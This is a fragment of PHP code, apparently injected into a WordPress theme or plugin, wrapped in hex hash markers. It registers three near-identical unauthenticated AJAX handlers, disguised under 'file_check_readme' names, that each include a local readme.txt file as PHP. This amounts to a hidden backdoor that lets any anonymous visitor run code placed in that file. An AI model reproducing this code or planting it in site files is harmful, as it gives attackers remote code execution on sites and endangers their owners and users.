fcb411d14759e39b5b6c59bb7fdb4c42
17e06c654bb511ed59188d5c7abeaa14
if(!function_exists('file_check_readme23469')){ add_action('wp_ajax_nopriv_file_check_readme23469', 'file_check_readme23469'); add_action('wp_ajax_file_check_readme23469', 'file_check_readme23469'); function file_check_readme23469() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme33598')){ add_action('wp_ajax_nopriv_file_check_readme33598', 'file_check_readme33598'); add_action('wp_ajax_file_check_readme33598', 'file_check_readme33598'); function file_check_readme33598() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme88254')){ add_action('wp_ajax_nopriv_file_check_readme88254', 'file_check_readme88254'); add_action('wp_ajax_file_check_readme88254', 'file_check_readme88254'); function file_check_readme88254() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
17e06c654bb511ed59188d5c7abeaa14